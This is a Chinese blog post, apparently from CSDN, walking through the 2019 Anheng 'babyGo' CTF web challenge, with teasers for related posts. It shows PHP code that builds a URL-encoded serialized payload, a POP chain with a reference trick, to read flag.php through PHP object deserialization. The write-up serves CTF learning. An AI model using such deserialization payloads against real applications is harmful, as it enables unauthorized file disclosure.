babyGo(安恒2019.1 pop链的构造)

最新推荐文章于 2024-04-24 17:20:18 发布
最新推荐文章于 2024-04-24 17:20:18 发布
阅读量2.2k 收藏 7
点赞数 1
分类专栏: 安恒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stepone4ward/article/details/87908854
版权

周周练的时候看了一叶飘零师傅的博客才知道pop链的存在(还是太菜了啊),先来学习一下关于pop链的知识。
在这里插入图片描述
再看一看这道题目的baby类
在这里插入图片描述
也就是说这道题目中的类baby调用了sec类的read()方法。l
在这里插入图片描述
但是sec类的read()是一个安全函数,这时候发现cool类也存在一个read()方法,我们可以利用cool类的read()函数对flag.php进行读取。
在这里插入图片描述
这个时候就要利用最开始提到的pop链来调用cool类的read方法。构造的方法如下(将构造函数中的sec改为cool即可)
在这里插入图片描述

注意到cool类中read方法的判断语句$this->nice->aaa === $this->nice->bbb,而且$this->nice->aaa = $sth;变量aaa被一个未知量$sth赋值了。这个时候我们利用指针$a->bbb =&$a->aaa;这样bbb的值就能随着aaa的变化而变化,在线编译一下(其中amazing是一个序列化的空的baby类的对象)

<?php
class baby 
{   
    protected $skyobj;  
    public $aaa;
    public $bbb;
    function __construct() 
    {      
        $this->skyobj = new cool;
    }  
    function __toString()      
    {          
        if (isset($this->skyobj))  
            return $this->skyobj->read();      
    }  
}  

class cool 
{    
    public $filename='flag.php';     
    public $nice;
    public $amzing='O%3A4%3A%22baby%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00skyobj%22%3BO%3A4%3A%22cool%22%3A3%3A%7Bs%3A8%3A%22filename%22%3BN%3Bs%3A4%3A%22nice%22%3BN%3Bs%3A6%3A%22amzing%22%3BN%3B%7Ds%3A3%3A%22aaa%22%3BN%3Bs%3A3%3A%22bbb%22%3BR%3A6%3B%7D'; 
    function read()      
    {   
        $this->nice = unserialize($this->amzing);
        $this->nice->aaa = $sth;
        if($this->nice->aaa === $this->nice->bbb)
        {
            $file = "./{$this->filename}";        
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "you must be joking!"; 
            }    
        }
    }  
}  
class sec 
{  
    function read()     
    {          
        return "it's so sec~~";      
    }  
}  
$a = new baby();
$a->bbb =&$a->aaa; 
$b=serialize($a);
echo urlencode($b);
?>

get方式传入结果,得到flag

GAPPPPP
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
POP构造
一个打渔的的博客K6uQ5H7^ff(R
04-04 4319
序列化与反序列化 序列化是为了方便于数据的传输,形象化理解就像物流的过程。你想把一张桌子通过从a–>b,一张桌子肯定不好运输,因此需要把它拆开(这个拆的过程就是序列化);等到达了b需要把他组装起来(装的过程就是反序列化)。 PHP中的魔术方法 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问...
PHP反序列化—构造POP
Lemon's blog
04-03 4553
前言: 最近在刷题的时候发现这个PHP反序列化—POP,之前理解的序列化攻击多是在魔术方法中出现一些利用的漏洞,自动调用从而触发漏洞。但如果关键代码不在魔术方法中,而是在一个类的普通方法中。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。 直接通过题目来进行学习,这样更容易掌握!!! Ezpop class Modifier { protected $var; ...
php反序列化学习(中)--pop构造
最新发布
qq_75120258的博客
04-24 859
打开环境,进行代码审计这一题我们需要构造pop,既然要构造pop,我们就要找到头和尾(从尾在到头,一步一步的看,这样就思路清晰了)我们先去找尾,我们需要通过这个file_get_contents()函数来获得flag。
CTF-PHP反序列化漏洞3-构造POP
Eason_LYC安全白帽子的成长博客
05-08 1970
PHP反序列化攻击是一种常见的Web攻击,攻击者通过构造恶意的序列化数据,将其传递给目标服务器,从而导致服务器执行非预期的操作。而Pop则是一种利用PHP反序列化漏洞的攻击方式,可以在未授权的情况下执行任意代码。《CTF基础入门系列》专栏文章打破以往CTF速成或就题论题模式。采用系统讲解基础知识+入门题目练习+真题讲解方式。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
php反序列化之pop构造
m0_62422842的博客
04-06 7485
前言 随着对反序列化学习的不断深入,我们来学习一下pop构造。这个pop对于我这种小白来说还是比较难理解的,再次写下这篇文章总结一下,加深自己对构造pop的理解。同时也是提供想要入坑的小伙伴们一些理解。 pop构造 一般的反序列化题目,存在漏洞或者能注入恶意代码的地方在魔术方法中,我们可以通过自动调用魔术方法来达到攻击效果。但是当注入点存在普通的类方法中,通过前面自动调用的方法就失效了,所以我们需要找到普通类与魔术方法之间的联系,理出一种逻辑思路,通过这种逻辑思路来构造一条pop,从而达到
2019安恒一月月赛web1-babygo
0nc3的博客
01-28 1822
web1-babygo 考察知识点: PHP反序列化 POP构造 由于还是个萌新…只会一点反序列化,还是第一次知道POP构造,哭了 虽然没有写出来,但是想记录下这次学习过程 参考接:https://www.anquanke.com/post/id/170341 下面为题目源码 &amp;amp;amp;amp;lt;?php @error_reporting(1); include 'flag.php'; cla...
babygo:从头开始制作的Go编译器,可以自行编译。 这将是最小最简单的go编译器
02-05
Babygo,从头开始制作的go编译器 Babygo是一个小型且简单的go编译器。 (我相信,这是世界上最小最简单的。)它是从头开始制作的,可以自行编译。 不依赖任何库。 标准库和系统调用的调用是自制的。 Lexer,解析器和...
宝贝计划在线教育管理系统
08-12
在"babyGo1.1-master"这个文件名中,"master"通常表示这是项目的主分支,意味着这可能是项目的最新稳定版本。项目可能采用Git进行版本控制,通过GitHub或类似的平台进行协作和代码托管。 总的来说,“宝贝计划在线...
安恒月赛19年1月wp
南天_princess的博客
02-08 785
web1 babygo 这个是php反序列化的题,打开题目获得源码如下: &amp;amp;lt;?php @error_reporting(1); include 'flag.php'; class baby { protected $skyobj; public $aaa; public $bbb; function __construct() { ...
ctf-pop
qq_32445755的博客
05-15 1880
POP就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //用于从不可
CTF里WEB题中的POP
dangejinghong的博客
09-03 407
当这个php代码开始走的时候,先是__destruct()魔术方法被触发,然后echo出句子,当进行到。发现它调用了一个make_friends方法,但是这个方法不存在,所以触发call()魔术方法,在。__set_state(),调用var_export()导出类时,此静态方法会被调用。那么我们继续走,当进行isset()魔术方法时,echo出它的句子,然后发现其。__isset(),当对不可访问属性调用isset()或empty()时调用。__invoke(),调用函数的方式调用一个对象时的回应方法。
CTF-PHP反序列化漏洞4-实例理解POP(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 2306
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
php反序列化——pop构造[SWPUCTF 2021 新生赛]pop [NISACTF 2022]babyserialize
m0_73756016的博客
03-27 833
class w44m中的Getflag() -> class w33m中的__toString() -> class w22m中的 __destruct()$this->mw00->{$this->w22m}();的意思是调用当前对象的 w00m 属性中名为 $this->w22m 的方法。所以反推法第一步就是要调用Getflag()函数 找到$this->w00m->{$this->w22m}();mw00=w44m w22m = Getflag()即可调用Getflag()这题的条是(反推)
POP[MRCTF2020]Ezpop
cxiaodi的博客
06-11 87
pop
解:[NISACTF 2022]popchains--TLS_预备队任务(1)
river_mouth_man的博客
03-08 614
php反序列化,构造pop
VNCTF2023 babygo backdoor部分payload详解
m0_73606240的博客
02-26 325
看了几个人的vnctf2023的web复现,我觉得部分人可能会觉得backdoor部分的payload有点难理解,这里帮他们补充一下,先上源码
VNCTF 2023 - Web 象棋王子|电子木鱼|BabyGo Writeups
M1n9K1n9的博客
02-19 1934
VNCTF 2023 Web 象棋王子|电子木鱼|BabyGo
170917 逆向-WHCTF(BabyHack)
whklhhhh的博客
09-17 773
1625-5 王子昂 总结《2017年9月17日》 【连续第350天总结】 A. XCTF-Reverse B.EasyHook刚开始看这个名字还以为要注入DLL啥的呢(:з」∠)忐忑不安地打开发现结构挺简单:int __cdecl main(int argc, const char **argv, const char **envp) { int result; // eax@2
CTF Web复现』BUUCTF-[CISCN2019 华北赛区 Day1 Web1]Dropbox
Ho1aAs‘s Blog
09-08 920
利用点:任意文件读取;phar反序列化POP读取文件;绕过MIME文件上传;任意文件删除;phar://协议触发反序列化
Requirement already satisfied: numpy in e:\babygo\anaconda\lib\site-packages (1.19.5)
06-09
这个说明你的numpy已经是最新版本的1.19.5了,但是这个版本低于pomegranate要求的最低版本1.20.0,因此会产生冲突。 你可以尝试安装pomegranate的旧版本,该版本兼容numpy 1.19.5。例如,以下命令将安装pomegranate...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值